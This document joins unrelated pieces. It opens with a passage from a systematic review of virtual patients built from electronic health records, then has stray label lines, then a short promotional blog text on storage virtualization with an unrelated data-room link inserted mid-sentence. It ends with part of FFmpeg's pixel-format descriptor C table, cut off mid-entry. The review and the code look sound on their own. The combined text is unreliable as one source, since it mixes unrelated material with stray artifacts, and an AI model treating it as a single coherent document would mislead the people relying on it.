was available, or where the abstracts were simply too short to make a fair judgement, were rejected. In total, n = 279 abstracts were considered to be suitable while n = 83 were rejected. In phase 2, the remaining 279 abstracts were tagged with keywords in order to categorise them suitably for the final phases of the review. Phase 2 The second phase of the review consisted of tagging each of the remaining 279 abstracts with keywords in order to categorise them. This was performed in order to get a general understanding of how Virtual Patient development efforts are distributed worldwide. During this process, each citation was tagged with the attributes seen in Table 1. Table 1 Phase 1 categorisation The Suitable field was used to denote the suitability of the abstract for further tagging, therefore citations with missing abstracts or abstracts that were deemed as being too short were marked as being unsuitable. The Teaching Type attribute could be one of either Graduate, Undergraduate, or NA. Teaching systems that were intended for both advanced level undergraduates and graduates were marked as being undergraduate systems. NA was reserved for systems, such as bio-simulations, that were not designed for teaching. The Article Type attribute referred to the type of Virtual Patient system that was being reported in the article. Systems that utilised both hardware and software were marked as software systems. Reports denoted any papers where a third party system was being tested or evaluated, for example papers that described using the Web-SP system. The model attribute was used to denote any Virtual Patient systems that modelled or simulated virtual populations or physiological systems such as bio-simulations of diabetic patients. The Patient Records attribute is a Boolean value that denotes whether the abstract explicitly mentioned using real patient data in the design of the Virtual Patient. This attribute was used to preselect the articles that would be included in the full-text review. Phase 3 This phase involved executing a number of SQL queries on the tagged citations. This was done to gain an understanding of how the development of Virtual Patients is distributed worldwide. Distribution of systems Of the 279 citations that were accepted beyond phase 1 of the review, approximately 40% were found to be discussing software-based Virtual Patients, as seen in Figure 2. Figure 2 figure 2 Distribution of article types. The suitable abstracts were distributed as follows: 113 (≈40%) citations were tagged as being software systems, 17 (≈6%) were tagged as being hardware only systems, 75 (≈27%) were tagged as being models of some kind, such as bio-simulations, and 74 (≈27%) were reports including reviews and papers on 3rd party system adoption. Distribution of teaching types A total of 148 systems were classified as being teaching systems. Of those, approximately 60% were used to teach undergraduate students and 40% were used to teach or train graduates, as shown in Figure 3. Only articles that were used for teaching or training were considered for the final phase of the review. Figure 3 figure 3 Distribution of teaching types. The distribution of the teaching types. Phase 4 In this final phase of the review, the full-text articles for all citations that were categorised as having used patient records were retrieved. Each article was then read to find evidence for the use of electronic health records or real patient data for the development of Virtual Patients. The Results section describes the outcome of this phase of the review in detail. Results A total of 28 full-text articles were retrieved for the final review phase, the results of which are described in this section. For this section, the reviewed papers have been subdivided into those that use patient data in the form of medical images, and those that use other forms of patient data and electronic health records such as lab reports, electrocardiograms, physician notes, and so on. This was done, first to reduce the set of papers further (as we wished to find papers that use all forms of electronic health record and do not solely use medical imaging data), and to aid in readability. We expand on this point in the Discussion section. A summary of each full-text article can be seen in the table in Additional file 2. Virtual patients based on medical image data A large proportion of the full-text articles reviewed described systems that based Virtual Patients on CT or MRI data only. Many of these articles focussed on creating 3D visualisations of regions of interest using existing medical imagery. In 2009, Jacobson et al. reported on the creation of Virtual Patients through the use of CT images of cadavers [5]. 3D reconstructions were created using the Osirix DICOM viewer, and subsequently exported as QuickTime movies for students to view. A similar method was employed by Parikh et al. (2009) who describe the use of CT scans to reconstruct 3D areas for use in a virtual surgery environment for preoperative planning. Their system was not intended for teaching purposes; rather it was a training platform [6]. This was similarly discussed in 2009 by King et al., where medical imaging data was used to reconstruct 3D regions. This was done to optimise port placement for in vivo biosensors [7]. Porro et al., in 2005, used recorded clinical data in the form of DICOM images, either from recent patients or from archives, to create 3D reconstructions [8]. In 2005 IM Heer et al. discussed a training device that allows for virtual training of ultrasound cases [9]. Research carried out in 2002 by Michel et al. discusses a virtual reality system for training endourological procedures. Patient data were obtained from CT and MRI scans [10]. Freysinger et al. [11] described a 3D virtual reality system where CT and MR data sets were used to create the 3D renderings, similar to the work performed by Porro, King, Jacobson, and Parikh. Wolfram Lamadé’s group discussed 3D modelling of CT scans from their paper of 2000. A number of Virtual Patients (a total of 7) were created from this data to test if liver surgery planning could be improved using 3- and higher-D representations [12]. Finally, in an article for the European Journal of Ultrasound, H.H. Ehricke addressed sonography education where ultrasound simulation was employed. The article describes an extensible case database, where cases could be continually added to a pool. The cases consisted of 3D data sets, which were acquired either from patients or healthy subjects. The cases also included textual case descriptions in the form of annotations [13]. In the context of this review, Ehricke’s article matches closely the type of work our group were most interested in finding; the platform described in the paper allows for interchangeable cases and the cases are annotatable. What is apparent is that the vast majority of Virtual Patients that are based on medical image data are 3D representations that are reconstructed from exiting patient CT or MRI data. This should come as no great surprise to those who are active in the area of medical software simulation. However, of special interest to our group were any articles that reported on Virtual Patient development where several types of medical documentation were used. The next section describes any papers that were found that match this criterion. Virtual patients based on patient data While the majority of the systems described in the previous section used quite similar approaches for creating cases, the Virtual Patients produced using other forms of patient data were more varied in their design and implementation. Due to the variety of their approaches, the manuscripts could be further subdivided into three categories: Virtual Patients that were used for teaching and training purposes, virtual consultancy systems, and assessment systems. Teaching and training The vast majority of full-text papers reviewed dealt with Virtual Patients used for teaching undergraduate students and for training, and these are described here. Shyu et al. reported creating Virtual Patients using electronic health records gathered from a hospital information system. Shyu’s group also reported on using the SCORM (Sharable Content Object Reference Model) standard to aid the sharing and transfer of cases between medical centers [14]. Similary, Trace et al. (2012) describe a system where students authored electronic cases. Students gathered patient data and created Virtual Patients using a custom PowerPoint template. This paper highlights how, by using patient data gathered from hospital information systems, Virtual Patients can be made efficiently while maintaining their efficacy as a valid teaching tool [15]. In 2009, Ullrich et al. described a 3D simulator that used MRI scans. By using an XML-based database, the ability to create cases involving arbitrary scenarios was possible, allowing for a subject database to be created [16]. In an article reported in the Studies in Health Technology and Informatics journal, Oliven et al. describe a web-based Virtual Patient application. The system allows for natural language processing whereby students may ask open questions and receive answers, allowing them to request lab reports or other clinical data [17]. Abendroth et al. describe the use of original documents to create Virtual Patients that were integrated into the CASUS system [18]. In their study, ten patient cases were developed that were based on electronic health records, in an attempt to better decision-making skills. The group used anonymised patient records and laboratory results to create the cases, and they were annotated to provide feedback to students regarding hypothesis refinement and background information. A self-assessment questionnaire was used gather student satisfaction levels, although the authors admitted that too few responded to be able to make any real claims as to their method’s efficacy. In 2012, Pinnock et al. described an eLearning system entitled evPaeds in The Clinical Teacher. Cases were created for their system using real examinations notes, history notes, test results, and X-rays by expert clinicians, who also provided feedback and meta-data for the students who use the system. The group provided solid arguments as to why using real patient data is desirable in the production of Virtual Patients, which reiterate our group’s statements [19]. In 2011, Hörnlein et al. outlined a system known as CaseTrain. This system allows students to examine patients and answer questions relating to the patient as the case develops. Electronic health records themselves are not used directly, as the interface is based on Flash and patient records are adapted to suit the interface. The system allows for interchangeable cases, which are prepared in Word format before being imported into the system [20]. In 2011, Edelbring et al. described a series of Virtual Patients based on authentic rheumatology patients created through patient interviews, text, laboratory results, and so on. A total of four Virtual Patients were created in this way, and they were accessible using a system known as ReumaCase. Therefore, the system created used patient cases that were interchangeable, yet they were not based primarily on electronic health records and could potentially incur long production times [21]. Video enhanced Virtual Patients were the subject of work performed by Adams et al. in 2011. The Virtual Patients were again produced to run on a 3rd party system, in this case the Quandary platform. [22]. In Medical Teacher, Poulton et al. (2009) discuss the replacement of paper cases using Virtual Patients. The new Virtual Patients were designed using the VUE system (Tufts University’s Visual Understanding Environment) and subsequently transferred to the OpenLabyrinth system (an open source version of the Labyrinth software). Therefore, the cases were interchangeable and the cases were based on real patients. However, the electronic health records themselves were not used as all patient data were reformatted for use with the OpenLabyrinth architecture [23]. Hooper et al. discuss using Virtual Patients to study any variation in depression care and decision making among physicians. The group constructed 32 CD-ROM Virtual Patients. The group specifically aimed to answer whether or not the Virtual Patients they created were believable. The vignettes they created required using actors, although some of the scripts they used were based on actual physician-patient encounters. The group spent 12 months ensuring the cases were operational and believable. This shows once again the efforts that are often required to create and produce Virtual Patients. 90% of the physicians using the system either agreed or strongly agreed when asked about whether the Virtual Patients seemed real to them [24]. In 2008, Vukanovic-Criley et al. reported using recordings of patients at the bedside, along with actual heart sounds, to train cardiac examinations. The patients’ real echocardiograms, chest X-rays, and lab reports were also used in the creation of the Virtual Patients. Real patient data, therefore, was used extensively; however the Virtual Patients were nonetheless produced (due to the recordings at the bedside, recordings of the heart murmurs, and so on) and required extensive effort to create [25]. In Medical Teacher, Dewhurst et al. once again describe work in which Virtual Patients were collaboratively developed, where a total of 20 cases were developed in this way. Again, this group created their storyboards using the VUE system and imported them into the Labyrinth software. Due to this, the cases created were interchangeable, allowing for collections, or pools, of cases to be built [26]. Schittek Janda et al. describe a Virtual Patient system used in oral health care. The system created was generic, and cases from other medical fields could be imported into it. The system is novel in that it does not provide the student with a list of options from which to choose when input is required. Instead, the student should make decisions using free-text input when, for example, requesting clinical records. This was similar to the work carried out by Oliven et al. Patient data is used throughout, although it had been reformatted to suit the web-based interface [27]. Virtual consultancy Two papers used Virtual Patients to create virtual consultancies. Wood et al. created a Virtual Consulting Room that allowed doctors to view the progress of patients no longer in their care. The system was intended to be used primarily by junior doctors in order to understand the rationale behind clinical decision-making [28]. Smith et al. performed similar work in their paper for Medical Teacher in 2007. The authors describe Patient-Centred Learning, an evolution of Problem-Based Learning, through the use of high-fidelity Virtual Patients. The group described using the electronic health record, modified for educational purposes, to create a virtual practice. These electronic health records can also link to electronic learning resources. Interestingly, the authors describe the real-time arrival of new data for Virtual Patients, yet the test students were not convinced of the usefulness of this feature. Students preferred to be able to “look ahead” at the patient’s eventual outcome. The students in the study were undergraduate students [29]. Assessment Three further papers described the use of Virtual Patients for assessment purposes. Gunning et al. describe a system where Virtual Patients were used for the assessment of students who completed a case-based learning course. The group mentioned one patient case in detail, which consisted of 25 physical exams, 25 lab or imaging tests, and so on. Therefore, the group used a broad range of electronic health records for the creation of their Virtual Patients [30]. Courteille et al. report on the use of a single Virtual Patient as an assessment tool [31], while Subramanian et al. used a web-based medical learning modality that allowed students to treat a memorable Virtual Patient in a case-based format to test its effectiveness in comparison to a traditional lecture-based format. Two groups of students were assessed three weeks after participating in either a lecture-based modality or the Virtual Patient-based modality. Significant improvements were recorded for the group that used the Virtual Patient [32]. Discussion Creating Virtual Patients requires considerable effort both monetarily and in terms of person hours. A survey of U.S. and Canadian medical schools by Huang et al. found that the development of Virtual Patients costs are high, with 85% of Virtual Patients costing more than $10,000 to produce and taking an average of 16.6 months to complete. The group also found that the vast majority of Virtual Patients are media-rich, which is partly responsible for these very high costs [3]. However, much research has shown that the development of sound clinical reasoning skills and decision-making abilities is inextricably linked to experience. More specifically, students should encounter multiple, similar cases where subtle variations in patient presentations exist [33]. Through contact with many, subtly different patients, students begin to learn how to build “illness scripts”. As stated by Norman et al., it is “the power of the plural” which is key to learning decision-making skills [34]. However, if Virtual Patients and Virtual Patient cases are so costly to develop, it is unlikely that the plurality of cases required can realistically be generated for a student to develop such depth of reasoning. Again, it is argued that that for a student to develop good decision-making skills, they must encounter variations of prototypical patient presentations, with each presentation differing only slightly but with largely varying outcomes. For this to be achieved through the use of Virtual Patients, pools of cases are required. However, as can be seen from the work of Huang et al., such archives would be difficult and costly to create through the use of produced, media-rich Virtual Patients. Therefore, our group began experimenting with the notion of creating Virtual Patients using electronic health records that are abundantly available on hospital information systems. This was done with the ultimate aim in reducing the costs and effort needed to produce Virtual Patients in sufficient numbers. To investigate whether there has been any precedent in this field, this literature review was undertaken. We have seen that although patient data is used extensively to create Virtual Patients, it is rare to see electronic health records used in their raw, unformatted state. With the exception of Virtual Patients based on CT or MRI data, most Virtual Patients, that use real patient data, use data which has been extracted from electronic health records and subsequently reformatted to suit the platform upon which they are run. This reformatting constitutes production costs and it is exactly this that our group wishes to avoid by making use of electronic health records directly, without the need for extensive reformatting or data extraction. This does, however, beg the question: why is the use of patient data, in its raw form, so rare? We believe there are several reasons for this, namely, 1) patient records are still being handwritten and the use of electronic records is far from widespread 2) there are concerns regarding patient data and anonymisation, and 3) they may contain too many gaps or missing pieces of information. The third point may be the most difficult hurdle to surmount, yet it is the belief of the authors that physician annotations would mitigate this issue to a large degree. We also believe that the potential for using annotated health records has not yet been investigated thoroughly. This point will be the subject of future work. Last, there was little evidence, from the papers reviewed here, of any widespread use of standards such as SCORM to enable inter-institutional collaboration and sharing of Virtual Patients. Several papers describe the ability of their systems or platforms to allow for pools of cases to be accumulated, or that their systems allowed for cases to be imported easily, yet they often failed to mention adhering to any particular standards. That said, projects such as eViP, or the IVIMEDS inter-school Reusable Learning Objects [29], go some way to help increase collaboration by defining standards for Virtual Patient creation. Conclusions This paper reports on the usage of unformatted electronic patient records for the creation of Virtual Patients. This review has shown that while patient data is often used as material for the creation of Virtual Patients, the use of the electronic health record is less prevalent. Of those Virtual Patients that made use of real patient data, most reformatted the data to suit the platform on which they were to be viewed. This reformatting, in itself, requires a considerable amount of time. Due to fragmentation, these Virtual Patients (or Virtual Patient cases) cannot be easily interchanged or exchanged, further hampering interschool collaboration. With the exception of DICOM, standards are not widely adopted. Our group is of the opinion that there are several advantages to using electronic health records for the creation of Virtual Patients, including not only the aforementioned time and monetary savings. The Casebook application being developed by our group will read electronic health records, organised temporally into cases, which have been annotated with meta-information by the teaching physician. Questions for the student to answer appear between patient records, with the next patient record revealing the answer to the question. Patient records are extracted from a hospital information system and used directly, without any reformatting or data extraction. Using health records directly means that Virtual Patients can be more easily created allowing for pools of cases to be built; important for enhancing clinical reasoning and clinical decision-making. Our group has previously reported on this in detail [4]. References 1. Consorti F, Mancuso R, Nocioni M, Piccolo A: Efficacy of virtual patients in medical education: a meta-analysis of randomized studies. Comput Educ. 2012, 59 (3): 1001-1008. 10.1016/j.compedu.2012.04.017. Article  Google Scholar  2. Holzinger A, Kickmeier-Rust M, Wassertheurer S, Hessinger M: Learning performance with interactive simulations in medical education: lessons learned from results of learning complex physiological models with the HAEMOdynamics SIMulator. Comput Educ. 2009, 52 (2): 292-301. 10.1016/j.compedu.2008.08.008. Article  Google Scholar  3. Huang G, Reynolds R, Candler C: Virtual patient simulation at US and Canadian medical schools. Acad Med. 2007, 82 (5): 446-451. 10.1097/ACM.0b013e31803e8a0a. Article  PubMed  Google Scholar  4. Bloice M, Simonic K, Kreuzthaler M, Holzinger A: Development of an interactive application for learning medical procedures and clinical decision making. Information Quality in e-Health. 2011, 7058: 211-224. 10.1007/978-3-642-25364-5_17. Article  Google Scholar  5. Jacobson S, Epstein SK, Albright S, Ochieng J, Griffiths J, Coppersmith V, Polak JF: Creation of virtual patients from CT images of cadavers to enhance integration of clinical and basic science student learning in anatomy. Med Teach. 2009, Aug, 31 (8): 749-751. 10.1080/01421590903124757. Article  PubMed  Google Scholar  6. Parikh SS, Chan S, Agrawal SK, Hwang PH, Salisbury CM, Rafii BY, Varma G, Salisbury KJ, Blevins NH: Integration of patient-specific paranasal sinus computed tomographic data into a virtual surgical environment. Am J Rhinol Allergy. 2009, 23 (4): 442-447. 10.2500/ajra.2009.23.3335. Article  PubMed  Google Scholar  7. King BW, Reisner LA, Ellis RD, Klein MD, Auner GW, Pandya AK: Optimized port placement for in vivo biosensors. Int J Med Robot. 2009, Sep, 5 (3): 267-275. 10.1002/rcs.257. Article  PubMed  Google Scholar  8. Porro I, Schenone A, Fato M, Raposio E, Molinari E, Beltrame F: An integrated environment for plastic surgery support: building virtual patients, simulating interventions, and supporting intraoperative decisions. Comput Med Imaging Graph. 2005, Jul, 29 (5): 385-394. 10.1016/j.compmedimag.2005.02.005. Article  PubMed  Google Scholar  9. Heer IM, Middendorf K, Müller-Egloff S, Dugas M, Strauss A: Ultrasound training: the virtual patient. Ultrasound Obstet Gynecol. 2004,, 24 (4): 440-444. 10.1002/uog.1715. Article  CAS  PubMed  Google Scholar  10. Michel MS, Knoll T, Köhrmann KU, Alken P: The URO Mentor: development and evaluation of a new computer-based interactive training system for virtual life-like simulation of diagnostic and therapeutic endourological procedures. BJU Int. 2002, Feb, 89 (3): 174-177. 10.1046/j.1464-4096.2001.01644.x. Article  CAS  PubMed  Google Scholar  11. Freysinger W, Truppe MJ, Gunkel AR, Thumfart WF: A full 3D-navigation system in a suitcase. Comput Aided Surg. 2001, 6 (2): 85-93. 10.3109/10929080109145995. Article  CAS  PubMed  Google Scholar  12. Lamadé W, Glombitza G, Fischer L, Chiu P, Cárdenas CE, Thorn M, Meinzer HP, Grenacher L, Bauer H, Lehnert T, Herfarth C: The impact of 3-dimensional reconstructions on operation planning in liver surgery. Arch Surg. 2000, Nov, 135 (11): 1256-1261. 10.1001/archsurg.135.11.1256. Article  PubMed  Google Scholar  13. Ehricke HH: SONOSim3D: a multimedia system for sonography simulation and education with an extensible case database. Eur J Ultrasound. 1998, Aug, 7 (3): 225-300. 10.1016/S0929-8266(98)00033-0. Article  CAS  PubMed  Google Scholar  14. Shyu FM, Liang YF, Hsu WT, Luh JJ, Chen HS: A problem-based e-Learning prototype system for clinical medical education. Stud Health Technol Inform. 2004, 107 (Pt 2): 983-987. PubMed  Google Scholar  15. Trace C, Baillie S, Short N: Development and preliminary evaluation of student-authored electronic cases. J Vet Med Educ. 2012, Winter, 39 (4): 368-374. 10.3138/jvme.0212-017R. Article  PubMed  Google Scholar  16. Ullrich S, Grottke O, Fried E, Frommen T, Liao W, Rossaint R, Kuhlen T, Deserno TM: An intersubject variable regional anesthesia simulator with a virtual patient architecture. Int J Comput Assist Radiol Surg. 2009 Nov, 4 (6): 561-570. 10.1007/s11548-009-0371-5. Article  PubMed  Google Scholar  17. Oliven A, Nave R, Gilad D, Barch A: Implementation of a web-based interactive virtual patient case simulation as a training and assessment tool for medical students. Stud Health Technol Inform. 2011, 169: 233-237. CAS  PubMed  Google Scholar  18. Abendroth M, Harendza S, Riemer M: Clinical decision making: a pilot e-learning study. Clin Teach. 2013, Feb, 10 (1): 51-55. 10.1111/j.1743-498X.2012.00629.x. Article  PubMed  Google Scholar  19. Pinnock R, Spence F, Chung A, Booth R: evPaeds: undergraduate clinical reasoning. Clin Teach. 2012, 9 (3): 152-157. 10.1111/j.1743-498X.2011.00523.x. Article  PubMed  Google Scholar  20. Hörnlein A, Mandel A, Ifland M, Lüneberg E, Deckert J, Puppe F: Acceptance of medical training cases as supplement to lectures. GMS Z Med Ausbild. 2011, 28 (3): 1-7. Google Scholar  21. Edelbring S, Dastmalchi M, Hult H, Lundberg IE, Dahlgren LO: Experiencing virtual patients in clinical learning: a phenomenological study. Adv Health Sci Educ Theory Pract. 2011, Aug, 16 (3): 331-345. 10.1007/s10459-010-9265-0. Article  PubMed  Google Scholar  22. Adams EC, Rodgers CJ, Harrington R, Young MD, Sieber VK: How we created virtual patient cases for primary care-based learning. Med Teach. 2011, 33 (4): 273-278. 10.3109/0142159X.2011.544796. Article  CAS  PubMed  Google Scholar  23. Poulton T, Conradi E, Kavia S, Round J, Hilton S: The replacement of ‘paper’ cases by interactive online virtual patients in problem-based learning. Med Teach. 2009, Aug, 31 (8): 752-758. 10.1080/01421590903141082. Article  PubMed  Google Scholar  24. Hooper LM, Weinfurt KP, Cooper LA, Mensh J, Harless W, Kuhajda MC, Epstein SA: Virtual standardized patients: an interactive method to examine variation in depression care among primary care physicians. Prim Health Care Res Dev. 2008, Oct 1, 9 (4): 257-268. 10.1017/S1463423608000820. Article  PubMed  PubMed Central  Google Scholar  25. Vukanovic-Criley JM, Boker JR, Criley SR, Rajagopalan S, Criley JM: Using virtual patients to improve cardiac examination competency in medical students. Clin Cardiol. 2008, Jul, 31 (7): 334-339. 10.1002/clc.20213. Article  PubMed  Google Scholar  26. Dewhurst D, Borgstein E, Grant ME, Begg M: Online virtual patients - A driver for change in medical and healthcare professional education in developing countries?. Med Teach. 2009, Aug, 31 (8): 721-724. 10.1080/01421590903124732. Article  PubMed  Google Scholar  27. Schittek Janda M, Mattheos N, Nattestad A, Wagner A, Nebel D, Färbom C, Lê DH, Attström R: Simulation of patient encounters using a virtual patient in periodontology instruction of dental students: design, usability, and learning effect in history-taking skills. Eur J Dent Educ. 2004, Aug, 8 (3): 111-119. 10.1111/j.1600-0579.2004.00339.x. Article  CAS  PubMed  Google Scholar  28. Wood E, Tso S: The virtual continuity in learning programme: results. Clin Teach. 2012, Aug, 9 (4): 216-221. 10.1111/j.1743-498X.2012.00551.x. Article  PubMed  Google Scholar  29. Smith SR, Cookson J, McKendree J, Harden RM: Patient-centred learning-back to the future. Med Teach. 2007, Feb, 29 (1): 33-37. 10.1080/01421590701213406. Article  PubMed  Google Scholar  30. Gunning WT, Fors UG: Virtual patients for assessment of medical student ability to integrate clinical and laboratory data to develop differential diagnoses: comparison of results of exams with/without time constraints. Med Teach. 2012, 34 (4): e222-e228. 10.3109/0142159X.2012.642830. Article  PubMed  Google Scholar  31. Courteille O, Bergin R, Stockeld D, Ponzer S, Fors U: The use of a virtual patient case in an OSCE-based exam- a pilot study. Med Teach. 2008, 30 (3): e66-e76. 10.1080/01421590801910216. Article  CAS  PubMed  Google Scholar  32. Subramanian A, Timberlake M, Mittakanti H, Lara M, Brandt ML: Novel educational approach for medical students: improved retention rates using interactive medical software compared with traditional lecture-based format. J Surg Educ. 2012, Jul, 69 (4): 449-452. 10.1016/j.jsurg.2012.05.013. Article  PubMed  Google Scholar  33. Bowen JL: Educational strategies to promote clinical diagnostic reasoning. N Engl J Med. 2006, 355 (21): 2217-2225. 10.1056/NEJMra054782. Article  CAS  PubMed  Google Scholar  34. Norman G, Dore K, Krebs J, Neville AJ: The power of the plural: effect of conceptual analogies on successful transfer. Acad Med. 2007, 82 (10): S16-S18. Article  PubMed  Google Scholar  Pre-publication history Download references Author information Authors and Affiliations Authors Corresponding author Correspondence to Andreas Holzinger. Additional information Competing interests The authors declare that they have no competing interests. Authors’ contributions MDB, KMS, and AH conceived the idea of performing a systematic search of PubMed in order to find Virtual Patient systems that use electronic health records. MDB performed the extraction and reviewed the works. The Java application was written by MDB. The database was administered by MDB. All authors read and approved the final manuscript. Electronic supplementary material 12911_2013_717_MOESM1_ESM.htm Additional file 1:All citations considered for the review (articles.htm). All citations returned by the E-utilities API are included in this HTML file. The file, articles.htm, can be viewed with any web browser. The file contains links to PubMed for each of the 362 citations included in the review. For copyright reasons, the abstract texts themselves have been removed. (HTM 199 KB) 12911_2013_717_MOESM2_ESM.docx Additional file 2:Table of reviewed articles. Each of the full-text articles reviewed in the final phase of the review are shown here (Table 2.docx). Here it can be seen if any standards were followed, the type of patient data used to create the Virtual Patient(s), and whether the platform described allowed for cases to be interchanged. Where no standards such as SCORM have been followed, the case format is provided, such as XML or PowerPoint. (DOCX 22 KB) Authors’ original submitted files for images Rights and permissions Open Access This article is published under license to BioMed Central Ltd. This is an Open Access article is distributed under the terms of the Creative Commons Attribution License ( https://creativecommons.org/licenses/by/2.0 ), which permits unrestricted use, distribution, and reproduction in any medium, provided the original work is properly cited. Reprints and Permissions About this article Cite this article Bloice, M.D., Simonic, KM. & Holzinger, A. On the usage of health records for the design of virtual patients: a systematic review. BMC Med Inform Decis Mak 13, 103 (2013). https://doi.org/10.1186/1472-6947-13-103 Download citation • Received: • Accepted: • Published: • DOI: https://doi.org/10.1186/1472-6947-13-103 Keywords
__label__pos
0.777949
The Benefits of Virtual Data Storage Storage virtualization abstracts the storage management from physical hardware, and creates an overall storage capacity. This allows applications that run on a single server or a reduced number of servers. It also removes dependencies between data that is accessed at the file level and its physical location on the server, making it easier to optimize storage use, perform non-disruptive file migrations and much more. Storage https://myvirtualstorage.blog/how-much-does-it-cost-to-use-a-data-room virtualization is an essential element of modern IT environments. It has numerous benefits that can dramatically improve IT operations and reduce costs. It allows the company to reduce overheads by reducing the number of physical servers required for each application. Additionally, it makes it easier to migrate to new platforms for technology. The most significant benefit of virtual storage of data is that it helps to simplify the IT environment by decreasing the amount of physical hardware needed to support applications. In the past, each application had its own hardware. Think of print servers or mail servers. With traditional data storage models companies overcrowded their datacenters due to redundant and expensive hardware. Storage virtualization allows an IT team to simplify their approach and decrease the costs of maintaining an intricate datacenter. Virtual storage allows an organization to consolidate its server SAN while decreasing CAPEX. The same internal drives can be utilized for both purposes. It is also possible to achieve better performance and better utilization of storage by combining multiple storage arrays and disks into one pool that is accessed by all the servers in the SAN. Share: 0 TOP X
__label__pos
0.67275
/* * pixel format descriptor * Copyright (c) 2009 Michael Niedermayer * * This file is part of FFmpeg. * * FFmpeg is free software; you can redistribute it and/or * modify it under the terms of the GNU Lesser General Public * License as published by the Free Software Foundation; either * version 2.1 of the License, or (at your option) any later version. * * FFmpeg is distributed in the hope that it will be useful, * but WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU * Lesser General Public License for more details. * * You should have received a copy of the GNU Lesser General Public * License along with FFmpeg; if not, write to the Free Software * Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA */ #include "pixfmt.h" #include "pixdesc.h" const AVPixFmtDescriptor av_pix_fmt_descriptors[PIX_FMT_NB] = { [PIX_FMT_YUV420P] = { .name = "yuv420p", .nb_channels = 3, .log2_chroma_w= 1, .log2_chroma_h= 1, .comp = { {0,0,1,0,7}, /* Y */ {1,0,1,0,7}, /* U */ {2,0,1,0,7}, /* V */ }, }, [PIX_FMT_YUYV422] = { .name = "yuyv422", .nb_channels = 3, .log2_chroma_w= 1, .log2_chroma_h= 0, .comp = { {0,1,1,0,7}, /* Y */ {0,3,2,0,7}, /* U */ {0,3,4,0,7}, /* V */ }, }, [PIX_FMT_RGB24] = { .name = "rgb24", .nb_channels = 3, .log2_chroma_w= 0, .log2_chroma_h= 0, .comp = { {0,2,1,0,7}, /* R */ {0,2,2,0,7}, /* G */ {0,2,3,0,7}, /* B */ }, }, [PIX_FMT_BGR24] = { .name = "bgr24", .nb_channels = 3, .log2_chroma_w= 0, .log2_chroma_h= 0, .comp = { {0,2,1,0,7}, /* B */ {0,2,2,0,7}, /* G */ {0,2,3,0,7}, /* R */ }, }, [PIX_FMT_YUV422P] = { .name = "yuv422p", .nb_channels = 3, .log2_chroma_w= 1, .log2_chroma_h= 0, .comp = { {0,0,1,0,7}, /* Y */ {1,0,1,0,7}, /* U */ {2,0,1,0,7}, /* V */ }, }, [PIX_FMT_YUV444P] = { .name = "yuv444p", .nb_channels = 3, .log2_chroma_w= 0, .log2_chroma_h= 0, .comp = { {0,0,1,0,7}, /* Y */ {1,0,1,0,7}, /* U */ {2,0,1,0,7}, /* V */ }, }, [PIX_FMT_YUV410P] = { .name = "yuv410p", .nb_channels = 3, .log2_chroma_w= 2, .log2_chroma_h= 2, .comp = { {0,0,1,0,7}, /* Y */ {1,0,1,0,7}, /* U */ {2,0,1,0,7}, /* V */ }, }, [PIX_FMT_YUV411P] = { .name = "yuv411p", .nb_channels = 3, .log2_chroma_w= 2, .log2_chroma_h= 0, .comp = { {0,0,1,0,7}, /* Y */ {1,0,1,0,7}, /* U */ {2,0,1,0,7}, /* V */ }, }, [PIX_FMT_GRAY8] = { .name = "gray8", .nb_channels = 1, .log2_chroma_w= 0, .log2_chroma_h= 0, .comp = { {0,0,1,0,7}, /* Y */ }, }, [PIX_FMT_MONOWHITE] = { .name = "monowhite", .nb_channels = 1, .log2_chroma_w= 0, .log2_chroma_h= 0, .comp = { {0,0,1,0,0}, /* Y */ }, .flags = PIX_FMT_BITSTREAM, }, [PIX_FMT_MONOBLACK] = { .name = "monoblack", .nb_channels = 1, .log2_chroma_w= 0, .log2_chroma_h= 0, .comp = { {0,0,1,7,0}, /* Y */ }, .flags = PIX_FMT_BITSTREAM, }, [PIX_FMT_PAL8] = { .name = "pal8", .nb_channels = 1, .log2_chroma_w= 0, .log2_chroma_h= 0, .comp = { {0,0,1,0,7}, }, .flags = PIX_FMT_PAL, }, [PIX_FMT_YUVJ420P] = { .name = "yuvj420p", .nb_channels = 3, .log2_chroma_w= 1, .log2_chroma_h= 1, .comp = { {0,0,1,0,7}, /* Y */ {1,0,1,0,7}, /* U */ {2,0,1,0,7}, /* V */ }, }, [PIX_FMT_YUVJ422P] = { .name = "yuvj422p", .nb_channels = 3, .log2_chroma_w= 1, .log2_chroma_h= 0, .comp = { {0,0,1,0,7}, /* Y */ {1,0,1,0,7}, /* U */ {2,0,1,0,7}, /* V */ }, }, [PIX_FMT_YUVJ444P] = { .name = "yuvj444p", .nb_channels = 3, .log2_chroma_w= 0, .log2_chroma_h= 0, .comp = { {0,0,1,0,7}, /* Y */ {1,0,1,0,7}, /* U */ {2,0,1,0,7}, /* V */ }, }, [PIX_FMT_XVMC_MPEG2_MC] = { .name = "xvmc_mpeg2_mc", .flags = PIX_FMT_HWACCEL, }, [PIX_FMT_XVMC_MPEG2_IDCT] = { .name = "xvmc_mpeg2_idct", .flags = PIX_FMT_HWACCEL, }, [PIX_FMT_UYVY422] = { .name = "uyvy422", .nb_channels = 3, .log2_chroma_w= 1, .log2_chroma_h= 0, .comp = { {0,1,2,0,7}, /* Y */ {0,3,1,0,7}, /* U */ {0,3,3,0,7}, /* V */ }, }, [PIX_FMT_UYYVYY411] = { .name = "uyyvyy411", .nb_channels = 3, .log2_chroma_w= 2, .log2_chroma_h= 0, .comp = { {0,3,2,0,7}, /* Y */ {0,5,1,0,7}, /* U */ {0,5,4,0,7}, /* V */ }, }, [PIX_FMT_BGR8] = { .name = "bgr8", .nb_channels = 3, .log2_chroma_w= 0, .log2_chroma_h= 0, .comp = { {0,0,1,6,1}, /* B */ {0,0,1,3,2}, /* G */ {0,0,1,0,2}, /* R */ }, .flags = PIX_FMT_PAL, }, [PIX_FMT_BGR4] = { .name = "bgr4", .nb_channels = 3, .log2_chroma_w= 0, .log2_chroma_h= 0, .comp = { {0,3,1,0,0}, /* B */ {0,3,2,0,1}, /* G */ {0,3,4,0,0}, /* R */ }, .flags = PIX_FMT_BITSTREAM, }, [PIX_FMT_BGR4_BYTE] = { .name = "bgr4_byte", .nb_channels = 3, .log2_chroma_w= 0, .log2_chroma_h= 0, .comp = { {0,0,1,3,0}, /* B */ {0,0,1,1,1}, /* G */ {0,0,1,0,0}, /* R */ }, .flags = PIX_FMT_PAL, 